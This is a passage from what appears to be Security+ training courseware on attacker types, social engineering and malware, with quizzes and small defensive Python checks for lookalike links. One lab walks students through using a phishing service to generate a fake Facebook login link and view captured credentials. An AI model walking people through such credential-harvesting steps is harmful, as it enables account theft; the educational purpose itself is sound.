Grey hat: Hackers who are neither really black hats nor white hats. They include those who research security flaws as a recreational exercise, those who break into systems without permission but do no intentional harm, and those who believe they are only acting to improve the state of computer security but also don't really care if their activities violate the law. Grey hats often are technically criminals, but usually aren't as serious a threat as black hats.


Attacker qualities
White hats pose no threat to you: they won't attack your systems unless you ask. Other attackers can be a threat, but exactly what kind they are depends on what they want from you, and what they can do. Some important qualities to consider include the following:

Exam Objective: CompTIA SY0-501 1.3.2, 1.3.3

Intent: Attackers might be motivated for any number of reasons. Some are after specific resources or information, others will take whatever they can find, and others just want to deny service or destroy information. Likewise, their underlying motivations may be personal, financial, or political.

Sophistication: Some attackers are relatively inexperienced, relying on automated tools or simple vulnerabilities. Others use much more subtle or personalized methods that can threaten even a secure organization, or even discover zero-day attacks which existing defenses cannot protect against.

Resources: While the stereotypical lone hacker using a home PC in some basement does exist and can do real damage, others can be even more threatening. Launching a major attack isn't easy, and might require significant computing resources, research time, or manpower. Some attackers are groups working to a common cause, and even lone attackers might gain access to a large number of computers and use them to mount even more powerful attacks.

Location: Some attacks require physical proximity to your computing resources, while others can be conducted from anywhere in the world. In both cases, there's a big difference between outside attackers who must first overcome your organization's external defenses, and inside attackers who already have at least some legitimate access. Inside attackers are far harder to defend against.

Target information: Some attackers might know little about your organization, and just probe at random network addresses until they find something vulnerable. Others, especially inside attackers, might have critical information about your assets and vulnerabilities which they can use to mount successful attacks. Others rely on open-source intelligence - that is, information they can gather about their targets from publicly available sources. Regardless of what knowledge they start with, dedicated attackers will gather more, opening with attacks meant to teach them more about your assets and defenses.

Note: You actually have some control over what open source intelligence attackers have access to. The less you reveal to outside parties about your informational assets and network configuration, the less attackers will know without performing more active research or probes that you might detect. Remember that once information becomes public you may never be able to hide it again.


Common attacker types


The first criminal hackers to really gain public attention were freelance thrill seekers or data thieves with no
particular allegiances. That sort of attacker hasn't gone away, but there are many other common types today.

Exam Objective: CompTIA SY0-501 1.3.1

Script kiddies: Unskilled hackers who rely on commonly available attack tools (including malicious scripts, thus the name). Script kiddies commonly deface websites, spread malware, or interrupt services, but against poorly secured networks they can do even more damage.

Hacktivists: Hackers who attack organizations to further a political or ideological message. Some represent political, religious, or economic ideologies that aren't inherently computer related, and target perceived enemies of those groups. Others belong to freedom of information movements specifically oriented toward the idea that some or even all secret information should be released to the public. Such hacktivists might target any organization that stores data they believe should be free. Some hacktivists are also called cyberterrorists, especially if their methods would cause major disruptions to infrastructure, widespread panic, or human injury or death.

Organized criminals: Criminal hackers seeking financial gain who work as part of a larger organization. The organization itself might be connected to traditional criminal organizations, or might be focused entirely on hacking. Either way, such attackers will target any resources they can sell to others. They may also seek to clandestinely gain system access for other operations, or information they can use to blackmail senior executives.

Competitors: Unethical businesses frequently attempt attacks on competitors, either to commit industrial espionage or to sabotage valuable resources.

Insiders: Many attacks are caused by employees, former employees who have retained network access, or others who already have knowledge of and access to the network.
 Inside thieves and embezzlers will target financial resources or valuable intellectual property. This sort is especially likely to work for a competitor or criminal organization.
 Disgruntled employees motivated by revenge against coworkers or superiors may sabotage systems or data, or otherwise try to cause whatever harm they can to assets.
 Employees who misuse company resources for personal purposes or to make their own jobs easier may mean no direct harm, but their actions can hurt performance and compromise security.
 Some employees attack systems to preserve their own job security. They might deliberately create problems only they know how to fix, or even sabotage systems in subtle ways that won't become apparent until after they've been fired.

Nation states: Many nations today employ intelligence agencies and dedicated cyberwarfare organizations to perform attacks against rival governments, businesses, political organizations, and anyone else they perceive to be a threat to their national interests. Major governments have unparalleled attack resources: they can devote large numbers of skilled attackers, powerful computers, and custom-made attack tools and exploits to compromise their targets. Some can even use governmental authority to compromise third parties such as equipment manufacturers or software vendors.


APT: More an attack type than an attacker type, an advanced persistent threat is an ongoing series of sophisticated attacks against a particular organization. APTs tend to target organizations with high-value data; they use long-term strategies of stealthy attacks from multiple angles, changing over time to adapt to evolving defenses. This makes them a real test of even the strongest organizational security. It takes a lot of resources and patience to conduct an APT, so it's a technique mostly used by nation states and the most capable corporate or organized criminal hackers.

Discussion: Attackers
1. If you've determined your assets and attack surface, why is it important to know the motivation of likely
attackers?
Motivation affects both what's most likely to be attacked and what the consequences of an attack would be.
For example, ordinary criminals might target customer payment credentials while a competitor would
have more interest in trade secrets and business operations. An inside attacker employed by someone else
is likely to steal important data, while one simply upset with management might rather destroy it.
2. What kinds of attackers are likely or unlikely for your organization to face?
Answers may vary. Any network can be attacked by script kiddies or disgruntled employees, but not every
organization is likely to be of much interest to state actors or hacktivists.

Assessment: Understanding attackers


1. What category of attackers are defined by their limited sophistication and reliance on pre-packaged tools?
Choose the best response.
 APTs
 Hacktivists
 Organized criminals
 Script kiddies

2. What kind of attacker is an APT most commonly associated with? Choose the best response.
 Business competitors
 Hacktivists
 Nation states
 Script kiddies

3. What category of attacker might also be called cyberterrorists? Choose the best response.
 Hacktivists
 Nation states
 Organized criminals
 Script kiddies


Module B: Social engineering


When you think of attack vectors, you probably think of viruses, network attacks, password cracking, and
other technological weapons. These exist, and you need to know about them, but they're hardly the only
threats your organization faces. Some of the most common and effective attacks target the human element of
your organization, tricking or manipulating employees into letting attackers bypass security controls. These
social engineering attacks can be found anywhere, and can be as difficult to defend against as any sophisticated
network assault. Fortunately, they rely on human impulses and practices that even non-technical staff can
learn to understand and defend against.
You will learn:
 Why social engineering is effective
 About impersonation
 About phishing and spam
 How social engineering can violate physical security
 How to minimize the risk of social engineering attacks

About social engineering


A misanthrope would tell you that humans are naive, unobservant, lazy creatures of habit who are terrible at
judging risk. Someone more optimistic might instead say that people are trusting, distractingly overworked,
and uneducated about security principles. It doesn't really matter how you see it: the important thing is that no
matter how bulletproof the security technology of an organization is, it can all be undone by insecure human
practices. Beyond that, while hackers have been developing their techniques for years, conventional thieves
and con artists have been honing their skills throughout human history.
Social engineering attacks take advantage of human behaviors to steal information directly, bypass security
measures, or compromise systems against future threats. Even an attacker with limited technological
knowledge can threaten advanced systems this way, especially by tricking a technician into doing the damage.
Social engineering is one of the biggest sources of security threats, and one of the most consistently
overlooked, so it's important to recognize attacks.
The most common factor in social engineering attacks is impersonation. Whether in person, by phone, or by
email, attackers pretend to be coworkers, technical support, bank workers, or other legitimate actors, just to
get others to let their guard down. It's surprisingly effective to just ask someone for their password, if you
have a good excuse about why you're not just a nosy stranger. Likewise, it's not hard to openly wander around
many secure areas: most others will be too busy to notice unless you call attention to yourself. Another
common factor is taking advantage of insecure behaviors in the real world: many users don't think of physical
security and computer security as part of the same whole.
Impersonation itself is just one part of the more central exploitation of trust. Social engineering is a key factor
in inside attacks, when a disgruntled or otherwise malicious employee exploits the trust of coworkers to do
harm. Inside attackers might not impersonate anyone else at all, but they're still pretending to be acting
honestly and with the best interests of the organization in mind even while they're working to sabotage it.
Often, inside attackers use coworkers as tools to gain access and permissions they don't have themselves, in
the human equivalent of a privilege escalation attack.


Why social engineering is effective


Social engineering seeks to manipulate users by exploiting human emotional traits like fear, greed, and pity.
Some of these traits, such as a sense of altruism, are not considered to be faults in most contexts, making them
even easier to exploit. This type of manipulation is as old as society itself.

Exam Objective: CompTIA SY0-501 1.2.1.11, 2.3.9.3


Here are a few of the principles that social engineers use to manipulate users. Any given attack might be built on two or three of them, or even more.

Authority: Attackers might try to project authority by imitating a government agency or an important person in a company. People tend to hand over information if they believe the attacker is a legitimate authority, even if company policy restricts it.

Intimidation: Some attacks attempt to scare the victim into compliance. This can be used in combination with impersonating authority, for instance, if the attacker pretends to be a senior executive who is angry and impatient for information.

Consensus: People are more likely to be taken in by a scam if it seems that other people think it's legitimate. Conversely, in the case of a hoax, a user is more likely to panic for no reason if others are, too.

Scarcity: The attacker plays on the user's fear of missing out on something good, trying to push them into making a hasty decision. This might be the offer of limited product deals if the user would only click a link or provide some information.

Urgency: The attacker tries to create a sense of urgency, again trying to push the user to a decision without thinking too much about it. Scarcity makes use of urgency, as does the implication that there will be consequences if the user doesn't act. "I have a sales presentation in ten minutes, and I really need those files now!"

Familiarity: People are far more likely to have their guard down with people they know and/or like. A social engineer after a valuable target might actually take time to become friends with an employee with security privileges. It's no surprise if the employee then trusts that new friend enough to answer questions or grant favors that are technically against policy.

Trust: Some people are very trusting. They just aren't expecting someone to try to fool them with kindness and open lies. Ultimately, most social engineering techniques come down to the user believing what the attacker is saying, even if it's a threat.


Impersonation
Impersonation is a powerful technique, especially in large organizations or those with frequent guests and
visitors. Consider the story of con man turned security consultant Frank Abagnale—you might better know
him as Leonardo DiCaprio's character from Catch Me If You Can, but he's a real person who built a criminal
career largely around impersonating others. While the movie, and maybe even his autobiography, is a
fictionalized and dramatized account of his exploits, it's full of examples of plausible impersonation attacks.

Exam Objective: CompTIA SY0-501 1.2.1.6


Early in his career, Abagnale acquired a Pan Am pilot's uniform and a fake ID, and used that to impersonate a
real pilot. While he didn't try to endanger people by flying planes unlicensed, over the course of a few years
his trick allowed him to take hundreds of free flights and find food and lodging around the world, all at
company expense. Other times he impersonated doctors, security guards, or even just took on inconsequential
aliases as part of banking fraud schemes. Any of these schemes could have been discovered quickly through
stricter security policies; as it was, he was arrested more than once. Even more often, he rapidly left a scam when someone got suspicious. But for the most part, it didn't take long for him to succeed in an attack, even when the damage was just stealing a free ride.
This sort of approach can work in a lot of businesses. In an office building with little overt security an obvious
stranger poking around might get some suspicion, but the right clothes, a purposeful stride, and what looks
like an ID badge at a glimpse will make the same people assume the unfamiliar person belongs there. Even if there's a receptionist's desk or an outright security checkpoint along the way, some combination of a delivery uniform, fake ID, and good cover story could get an attacker right past it. For that matter, "I'm from
IT" is one of the most potent lies you can tell to get access in many office buildings. A fake service technician
might even get someone to unlock the telecommunications closet, and get a private room to centrally access
the network from.
It doesn't stop at physical access either: much of what impersonators do is talk to people and get them to
divulge information or give access to services and resources. An employee asking for a password change, a
manager from another department demanding to "borrow" something, or a city official needing to review
company documents all could be attackers trying to trick you. Not all social engineering attacks are centered
around impersonation, but it's a key element to most of them.
Impersonation is especially dangerous over the phone. A voice conversation makes it harder to verify identity,
or to spot suspicious visual clues such as body language. While you might imagine people would be less
likely to give up sensitive information over the phone than in person, it's not always the case. Help desk
workers and other customer-facing employees are especially vulnerable to this, since they're trained to be
friendly and helpful but might not be trained about what not to reveal.

Phishing
Electronic communications like email, instant messaging, or social media sites allow whole new avenues for
impersonation and other social engineering attacks. One of the most popular is phishing, so named because
the attacker casts out "bait" in the form of official-looking messages requesting a response, and then catches
whoever takes the offer. The archetypical phishing attack is an email apparently from someone needing help,
or a business that you're a customer of, with a return address or website link for you to reach them. In truth,
it's just an attacker trying to steal information from you, or even infect your computer with malware.

Exam Objective: CompTIA SY0-501 1.2.1.1, 1.2.1.2, 1.2.1.3, 1.2.1.4


Phishing attacks can take many forms, and some can be pretty sophisticated. While most people today understand that there aren't any Nigerian princes looking to share their fortunes in exchange for a cash advance, those who have answered such advance-fee or 419 scams are often pulled into ever-increasing correspondence with the scammer, and conned out of more and more money. Some have even been tricked into overseas trips where they were kidnapped for ransom, or even murdered. More commonly, you might receive an official-looking email claiming to be from your bank or a major web commerce site with a fake link to their website. You might be able to tell just by looking at the link that something is wrong. For a harmless example, http://nbc.com.co/ is a parody news site with a domain name chosen to be easily mistaken for the television network site http://nbc.com/. If you look you can tell something is odd, but if you just glance and click you might be fooled.

Phishing attacks often claim to be from banks
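The sketch below (in Python, using the example URLs above) shows why such lookalike links work: users read the familiar name, but what matters is the registrable domain at the end of the hostname. Taking the last two labels is a deliberate simplification; a real check would consult the Public Suffix List.

from urllib.parse import urlparse

expected = "nbc.com"

for url in ("http://nbc.com/news", "http://nbc.com.co/news"):
    host = urlparse(url).hostname
    # Naive: take the last two labels as the registrable domain.
    registrable = ".".join(host.split(".")[-2:])
    status = "matches" if registrable == expected else "does NOT match"
    print(f"{url}: '{registrable}' {status} '{expected}'")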

Even once you click the attacker's link and go to the site, there's more to the attack. It might be nothing more
than a shoddy fake site with ads and malware links. On the other hand, it could be a carefully crafted
facsimile of the actual website expecting you to supply your user information. Some even use complex scripts
or other application attacks to change the browser address bar or even trick browsers designed to detect
fraudulent secure websites. Beyond that, just the fact that you responded at all shows them your email address is valid and that you're reading it, on top of any other information you send.
Phishing isn't limited to email. The same principles work for other text-based electronic communication like
IM or SMS, and social media sites today are filled with fraudulent user accounts that will try to befriend or
connect with you in order to launch a later attack. Even on an online video game you're likely to encounter
some malicious user impersonating a moderator or administrator and demanding information from you.
Some phishing variants are known by their own names.


Spear phishing: Typical phishing attacks are sent blindly to a large mailing list in hopes that someone will respond. In contrast, spear phishing targets a specific person or group of people, with content tailored to them—most commonly employees or customers of a specific company. A message claiming to be from an actual person in HR or customer service, even fraudulently, is more likely to get a response than a cold request to random people. It's even more convincing when it contains other personal or professional information the attacker was able to learn. Carefully targeted spear phishing by well-informed attackers is an increasingly common and very effective attack.

Whaling: An even more targeted type of spear phishing singles out high profile and high value targets, such as senior executives—whales instead of fish, in other words. The attacker researches the target to gain personal and business information, then forges a message that looks to be legitimate high-level correspondence: a legal subpoena, a complaint from a major client, or something else that can't just be delegated. Successful whaling attacks can be very damaging: the attacker might gain high level company secrets, executives' personal credentials, or even remote access to their computers.

Vishing: Voice phishing applies the techniques and goals of phishing to voice calls, especially those using voice over IP systems such as Skype or Vonage. Compared to ordinary telephone service, these make it easier to present false user information, bypass casual caller ID or tracing features, and otherwise obscure or falsify the attacker's identity. Once the call's made, it's like a phishing email or traditional telephone scam: the attacker, under a false identity, tries to get you to give up sensitive information.

URL hijacking
Apart from phishing, misleading URLs can also be used to directly target browser users who mistype a
website's name in the address bar, or visit a legitimate website that has typographical errors in its links. In a
technique called URL hijacking or typo squatting, a dishonest actor registers a domain name very similar to that of a popular site. When users mistakenly visit the squatter's site, they might be redirected to a
competitor, encounter nothing but ads or pornography, or even be subjected to malware or browser attacks.

Exam Objective: CompTIA SY0-501 1.2.2.17.1, 1.2.2.17.3, 1.2.2.17.4


URL hijacking can take a lot of different forms: the typo squatter might register a domain name with an easy
misspelling of the legitimate site's, or one with the proper domain but a different top-level domain. For
instance, a typo squatter targeting http://comptia.org/ might register http://comtia.org/ or
http://comptia.com/.

 From 1997 until 2004, visiting whitehouse.com (as opposed to the US government site
whitehouse.gov) would direct you to a pornography site. Since then it's been used for real estate,
video hosting, and other purposes, none of which are actually related to the White House most users
expect.
 Despite Google's best efforts, goggle.com has taken advantage of user errors for ten years: in the
past it was a malware site, though today it's "only" a surveying scam.
 Celebrity names are also very popular for typo squatting. Especially if the celebrity doesn't quickly
register their own name, it might become a squatter's site. Even in a political campaign, something like
candidatename.com might end up redirecting to an opposing site.

It can be difficult for website owners to do anything about typo squatters, since unless the domain name or site content actually infringes on trademarks there might be little legal recourse. The best technique is
preemptive: companies or people worried about the problem often register variant names or other top-level
domains, and set them to forward to the main site.
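Here's a minimal sketch in Python of generating the kind of lookalike names a defender might register preemptively or at least monitor; the domain is hypothetical, and real typosquat-monitoring tools cover far more permutations (homoglyphs, doubled letters, keyboard-adjacent keys, and so on).

DOMAIN, TLD = "comptia", "org"

def typo_variants(name):
    variants = set()
    for i in range(len(name)):
        variants.add(name[:i] + name[i + 1:])        # dropped letter: comtia
        if i < len(name) - 1:
            letters = list(name)
            letters[i], letters[i + 1] = letters[i + 1], letters[i]
            variants.add("".join(letters))           # swapped letters: cmoptia
    return sorted(variants - {name})

lookalikes = [f"{v}.{TLD}" for v in typo_variants(DOMAIN)]
lookalikes += [f"{DOMAIN}.{t}" for t in ("com", "net", "co")]  # other TLDs
print(lookalikes)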


In a related attack called clickjacking, a malicious page hides clickable content under seemingly normal content elements, so users clicking on them perform unwanted actions such as sharing important
information with the attacker. Users might be directed to that page by phishing or typo squatting, or the web
server itself might be compromised.
As a user, you have even less direct power over the problem. All you can really do to avoid being taken in by
URL hijacking is to avoid typing site names in manually, do it carefully when you must, and leave quickly if
anything seems strange about the site.

Spam and hoaxes


Phishing is the most dangerous form of social engineering by email, but it's not the only one. Close behind it
is the use of email to send malware as attachments. The attachment is framed as a document, an image, or
even a game, but actually opening it reveals a virus or Trojan horse that compromises the computer. Email
client features or malware scanners can potentially a malicious attachment, but that's no guarantee especially
if the recipient is determined to open it. Malware attachments might even be sent from a friend or coworker's
PC that's been infected, making it more likely the recipient will trust it.

Exam Objective: CompTIA SY0-501 1.2.1.9


The most common unwanted message on any electronic medium is spam. Literally trillions of unsolicited
messages are sent every year via email, instant messaging, forums, games, social media sites, fax machines,
and almost any other vector you can think of. Sometimes spam on a specific medium has its own term, such as
spim for spam sent by instant message or spit for spam sent by VoIP, but for most users "spam" means any
sort of unwanted content. Phishing and malware transmission can technically be classified as spam, but the
most common use is unsolicited commercial advertisement. Whether the products being sold are genuine or
fraudulent, such unwanted spam wastes network resources and more importantly the time of employees who
have to sort through their inboxes and decide what messages are important and what are just noise.
Other messages are hoaxes, false stories and misinformation either directly spread by an attacker or prankster,
or just forwarded on by users who were fooled by the hoax and want to notify their friends and coworkers.
Hoaxes today are most common on social media, but you can find them almost everywhere. Some are
relatively harmless, if you don't count the time half the office spends discussing the sudden death of a
(perfectly healthy) celebrity, or how Facebook is about to start charging a monthly fee. Others might suggest
that recipients take action on the hoax, often in ways that could compromise security or do other harm. If
employees start microwaving their phones to recharge the batteries, or, more likely, deleting a vital operating
system file because someone said it was a virus, a hoax can do real damage.


Physical intrusion by social engineering


Most social engineering attacks rely on human interaction to get people to divulge information or share
resources directly. Other times, impersonation or otherwise blending in is just a tool to get physical access to
where the attacker can steal something, access unprotected information, or spy on people. There are a number
of common techniques.

Exam Objective: CompTIA SY0-501 1.2.1.5, 1.2.1.7, 1.2.1.8

Shoulder surfing: Watching someone who is viewing or entering sensitive information, or eavesdropping on confidential conversations. It's easy to think of this as being literally over the shoulder, but people have been caught using binoculars or hidden cameras to steal passwords or ATM PINs. Shoulder surfing is especially a danger for employees doing work-related communications on mobile devices in public places, but it's a risk whenever guests or visitors are in the office, or when a malicious employee wants to learn something from a coworker with access he or she lacks.

Tailgating / Piggybacking: Getting into a secure area by tagging along right behind someone who has legitimate access, with or without their knowledge. A tailgater might join a crowd of authorized people that aren't individually checked, strike up some small talk with people to distract them from noticing they're letting an unauthorized visitor in, or even get a careless but polite person to hold a locked door open after entering. Tailgating might involve some verbal trickery, but it's mostly about blending in to get past physical security; it works very well in places that are securely locked or even guarded, but are busy enough to make employees careless about who's coming and going.

Dumpster diving: Literally digging in the target's trash, hunting for discarded documents and other media. The most obvious target is confidential information that's valuable in itself, or security-related information that can be used to compromise the system, but it's not all that's valuable. Routine documents like schedules, policy manuals, contact lists, and personal information or correspondence that don't have direct value to an attacker, and are much less likely to be securely disposed of, can be used to launch additional social engineering attacks. In itself, dumpster diving isn't social engineering, but it's frequently a prelude to it, and if the trash isn't literally out by the street the attacker might use impersonation to get there.

Defending against social engineering


Social engineering isn't very different from software exploits like malware and application attacks, in that it attacks vulnerabilities in a faulty system. The difference is that the system it exploits is human minds
and behavior, and those haven't really gotten any intrinsic security upgrades over the last several thousand
years. The closest you can get is user education, training employees to be aware of social engineering attacks
in order to not be fooled. You can also use policy, physical, or technical controls that make the attacks less
likely to succeed, but since so much of social engineering is convincing people to break policies and bypass
controls, that's harder than it sounds.
A safe posture against social engineering isn't easy even when you know what to look for. Not only do you
have to be suspicious and smart, you have to maintain both during the longest, busiest, or slowest days.
Through it all, you have to remain polite and understanding enough that you don't hurt relationships with
honest employees, customers, or authorities. Some principles are valuable against social engineering in
general, regardless of specific organizational policies.
 Learn what information should and should not be shared with the general public. The more sensitive it
is, the more important it becomes to get positive identification and a good reason to share it. This
includes both what you tell people and what you leave in visible places.


 Don't share passwords and credentials under any circumstances. If someone legitimately needs
information only you can access, you need to log in and do it yourself.
 Don't break security policies just because someone has a sympathetic story. If you can't verify that
someone has permission for you to help them, know how to quickly escalate the problem to a
supervisor or appropriate party, and clearly communicate the reasons why you can't just help directly.
 Learn to recognize suspicious behavior by both outside personnel and established employees: searching
or loitering in inappropriate places, lacking proper ID, asking strange or surprising questions or favors,
and so on.
 Learn what requests, such as password information, won't be made by email, and don't carelessly
follow links or advice from email or other electronic sources. If you must, learn how to tell when a link
or site is suspicious.

Policies are likewise vital in protecting against social engineers. Not only should policies explicitly codify
good awareness practices and training procedures, they should place layers of defense between employees
and the ability or temptation to innocently "help out" an attacker.
 Use least privilege and need to know policies that restrict employee permissions to also restrict their
ability to leak information.
 Enforce clean desk policies to keep sensitive information out of view.
 Require employees to log off or lock workstations or other devices to avoid someone sneaking on
without a password.
 Avoid dumpster diving by shredding or otherwise destroying sensitive documents on disposal.
 Define incident reporting and handling procedures to make sure that unusual user or guest behaviors
are discovered and acted on. Reporting should be easy, and user awareness should be reinforced and
rewarded.

Technical controls are important against social engineering, even when they only reduce the opportunity for
human error. While general techniques like physical security, system hardening, and strong passwords are
invaluable, a few others are helpful against specific attack types.
 Mantraps preventing multiple people from passing a security checkpoint at once discourage tailgating.
 Spam filters and antimalware can minimize the danger of spam and malicious attachments.
 Network and browser controls can recognize and block phishing links (a simple link check is sketched just after this list).
 Security cameras, alarm systems, and system logging can catch intruders in ways they can't talk their
way past, even if the detection is after the fact.
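
As a rough illustration of the kind of check such a control might apply, here is a minimal Python sketch that flags obviously suspicious links. The trusted-domain list and the specific heuristics are assumptions for the example, not a complete or recommended filter.

    # Minimal sketch of a link check; trusted domains and rules are illustrative only.
    from urllib.parse import urlparse
    import ipaddress

    TRUSTED_DOMAINS = {"example.com", "facebook.com"}   # hypothetical allow-list

    def looks_suspicious(url):
        parts = urlparse(url)
        host = parts.hostname or ""
        if parts.scheme != "https":          # login links over plain HTTP are a red flag
            return True
        if "@" in parts.netloc:              # user@host trick hides the real destination
            return True
        try:
            ipaddress.ip_address(host)       # raw IP address instead of a domain name
            return True
        except ValueError:
            pass
        # flag lookalikes such as facebook.com.evil.example
        return not any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)

    print(looks_suspicious("http://203.0.113.9/login"))         # True
    print(looks_suspicious("https://facebook.com.evil.test/"))  # True
    print(looks_suspicious("https://www.facebook.com/"))        # False

Real filters also use reputation feeds and content analysis; the point here is only that the URL itself carries signals worth examining before a user clicks.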

Discussion: Social engineering


1. What social engineering attacks have you encountered, in the workplace or your personal life?
Answers may vary, but almost everyone's encountered phishing email and casual scams of some sort.
2. What barriers would keep a smooth-talking person from just walking into your business and making off
with valuable equipment or data?
Answers may vary.
3. How could you better secure your workplace against social engineering?
Answers may vary, but could include technical controls, increased surveillance, or user education.


Exercise: Examining phishing attacks


You can perform this activity in any browser with internet access, but it's safest to do so in the Windows 7
VM. You'll create a phishing link designed to steal a user's password. It would be illegal to send it to
someone, so you'll just see how it works yourself.
Do This How & Why

1. In your web browser, navigate to http://z-shadow.co

2. Sign up for the site with an email address. If you don't want to register with a normal email address, you can enter an account somewhere like https://mailinator.com without logging in.

3. Create a phishing link. This site is just one way an attacker with limited technical
knowledge can still steal passwords.

a) Scroll down the page. There are links for a variety of popular social media sites,
games, email services, and even PayPal. You'll create a
Facebook link.

b) Next to the Facebook link, click English. A URL pops up.

c) Copy the link. Select the text and press Ctrl+C. (Other methods might not
be reliable.)

4. Try the phishing link.


a) Paste the link into a new browser tab.


It looks like a valid Facebook login page, and it even shows the site and URL as verified, but it will
actually redirect your input to the attacker's site.

b) Enter a fake email and password, then click Log In. (Note: Don't enter your real info.) You're redirected to an invalid website.

5. Check the results of your attempt. It may take a few minutes for the user name and password you
entered to appear.

a) Refresh the Z-Shadow page.

b) Click My Victims.

The fake user name and password you entered appear. A real
attacker could use this same site to steal passwords from your
coworkers.


Assessment: Social engineering


1. What kind of attack is most likely when you're doing sensitive work on your laptop at a coffee shop?
Choose the best response.
 Piggybacking
 Dumpster diving
 Shoulder surfing
 Smurfing

2. Impersonation is a core element to most social engineering attacks. True or false?


 True
 False

3. Several coworkers in the sales department received email claiming to be from you. Each message was
personally addressed, and contained a link to a "test site" and a request to log in with normal user
credentials. You never sent it, and on examination the supposed test site is a phishing scam. Just what
variant of phishing is this? Choose the best response.
 Pharming
 Spear phishing
 Vishing
 Whaling

4. What security controls can protect against tailgating? Choose all that apply.
 Alarm systems
 Clean desk policy
 Mantraps
 Security guards
 Spam filters

5. Social engineering attacks are most commonly either in person or over electronic media rather than on the
phone. True or false?
 True
 False


Module C: Malware
One of the most common and obvious security threats is malicious software installed on computers. You
might hear of viruses, worms, Trojan horses, spyware, adware, rootkits, or any number of other threats that
can get on your system. Collectively called malware, they are easy to encounter and can range from mildly
annoying to extremely damaging. Despite long and ever-increasing efforts to combat it, malware is still one of
the greatest threats to host security.
You will learn:
 About malware varieties
 How malware spreads
 How malware damages infected systems
 How malware avoids detection

Malware vectors
Malware can be seen as a problem on individual systems, but it commonly spreads through networks, and can
compromise network security. You'll often see the terms "virus", "worm", and "Trojan horse" used
interchangeably to describe malware, but it's important not to confuse them. While all three exploit security
vulnerabilities to infect systems, each uses a different vector and different vulnerabilities. They're not the only
vectors used, either; today there are several ways that malware can spread.

Exam Objective: CompTIA SY0-501 1.1.1, 1.1.4, 1.1.5, 1.1.12, 1.2.1.10

Virus Attaches malicious code to another file, where it can both do direct damage and spread
itself to other programs. Viruses themselves can be categorized according to
exactly what they infect to spread.
 Program viruses infect executable files, and are activated when you run the
program.
 Boot sector viruses infect the boot sector of a drive, and are activated when you
start the computer or access the drive.
 Macro viruses and script viruses infect data files used by applications with built-in
scripting languages, such as Microsoft Office. They are activated when you open
the file.
 Multipartite viruses can spread multiple ways and infect multiple types of files.

Regardless of type, generally viruses rely on human action to launch: someone has to run
the application, open the document, or insert the infected media. In addition to any other
harm it does, the typical virus replicates by infecting other files once it's running. Often an
active virus will remain resident in memory, even when the infected application that
installed it is no longer running. Early on, executable viruses were the most common sort,
which is largely why the word "virus" is still commonly used even when another term is
technically more accurate for a specific threat.


Worm Replicates itself by exploiting system vulnerabilities. A worm might infect application
files, but once it's running it can spread through the network unassisted, exploiting
vulnerable protocols or services. For example, before Service Pack 2 was released for
Windows XP, the operating system had no firewall and a highly vulnerable service
targeted by many worms, so just connecting to the internet could infect a PC in moments
without any other human action. Today, they include browser attacks that can infect your
system even if you don't knowingly download or run executable files. Because of how
they spread, worms are typically considered network attacks as well as malware.
Trojan Masquerades as a harmless or useful program, such as a game or even an antivirus
application. Like the wooden Trojan horse from the Greek myth, once a victim "takes it
inside" and runs the program, its malicious functions take over. Frequently the program
will work, or appear to work, just as outwardly advertised, while the harmful functions
either remain invisible to the user or just don't surface until later. As well as being
malware, Trojans are social engineering attacks relying on human trust to spread. They
often overlap with viruses or worms as well: an email attachment from a friend might be a
virus, while a phishing link on social media could direct you to malware servers that will
infect you through your browser.
Logic bomb Malicious code that lies dormant until a specific condition is met, such as a trigger date or
particular system activities. A logic bomb can spread as a virus, worm, or Trojan horse,
but it's especially popular for inside attackers with privileged access, such as disgruntled
employees. The most famous logic bomb was one of the first recorded: a programmer at
an insurance firm put code in the system that would be triggered if he was fired. Two
years later, when he was terminated for behavioral reasons, the logic bomb went off and
deleted thousands of payroll records. Related to logic bombs are easter eggs, which are
also hidden code that lies dormant until triggered, but which are usually benign. For example, an
easter egg might give a joke response to certain unlikely input.
Watering hole A newer sort of two-stage attack, where an attacker specifically infects a website or cloud
service used and trusted by a group or category of users who are the actual target. When
those users come to the "watering hole" they're infected through browser vulnerabilities or
by downloading infected files. This method can be particularly effective with users who
apply strict security settings and behaviors to unfamiliar sites, but let their technical or
behavioral guard down in trusted locations. Sophisticated watering hole attacks targeting
members of specific organizations in order to affect enterprise systems are just one
example of how malware threat vectors are evolving to meet increasing network security.

Malware payloads
The payload of any malware defines the malicious actions it takes, and the effects it has. Malware effects can
range from slowdowns and minor annoyances to data breaches, system failure, or even physical damage.
Even malware without any payload at all can do harm. The first significant worm, called the Morris worm,
supposedly wasn't designed to do damage at all, but to measure the size of the late-1980s internet. The
problem was that it replicated itself so often, and used so many resources, that it rendered thousands of
servers inoperative until they were repaired, and required the then-defenseless internet to be partitioned and
cleaned of the worm piece by piece.

Exam Objective: CompTIA SY0-501 1.1.2, 1.1.3, 1.1.7, 1.1.8, 1.1.9, 1.1.10, 1.1.11, 1.1.13
Some payloads do fairly generic sorts of damage, whether the extent is mild or extreme. They consume
system resources, introduce instability, delete or corrupt data, or maybe just display messages on the screen.
They might also disable antivirus software or other security controls in spreading or preventing detection,
making the system more vulnerable to other malware. Other payloads have specific effects notable enough
that they can be used to describe the malware itself.


Backdoor In general, a backdoor is any hidden way into a system or application that
bypasses normal authentication systems. Originally it meant when a programmer,
for malicious or legitimate troubleshooting reasons, included a secret access
method in the design process. In the case of malware, it refers to a payload that
creates such a backdoor when it infects the system, allowing attackers to exploit it
later. For example, a remote access trojan (RAT) is a trojan that invisibly installs a
remote access program an attacker can later use to access your computer.
Backdoors can be used to gather data, remotely control the computer, send spam
email, or do almost anything else the computer itself can.
Botnet Some backdoors are designed to let large numbers of computers be centrally
controlled, usually by the malware's creator, to achieve a common goal. The
resulting networks are called botnets, and the individual infected systems are
called zombies. The botnet's controller can direct zombies to send email, make
distributed denial-of-service attacks, gather information, or even perform
distributed computing tasks like Bitcoin mining, all without the knowledge of the
actual system owners. Many of today's large-scale network attacks and spam
operations are conducted by zombie hordes numbering in the thousands or
millions.
Ransomware Some malware, especially distributed by trojan horses, attempts to extort money
from the victim in order to undo or prevent further damage. Sometimes the
ransom itself is still disguised as a legitimate service, such as a bogus "free
antivirus" program claiming it's detected an infection but you need the paid
version to actually remove it. Others are more straightforward, like crypto-
malware that encrypts personal or entire drives, then demands payment for the
decryption key. Ransomware can employ many creative approaches, and is
growing in popularity and sophistication.
Spyware Any backdoor can potentially give access to sensitive data on the infected system,
but spyware is specifically designed to gather information about user and
computer activities to send to other parties. Spyware can be used to track browser
activity, redirect browser traffic, steal financial or user account information, or
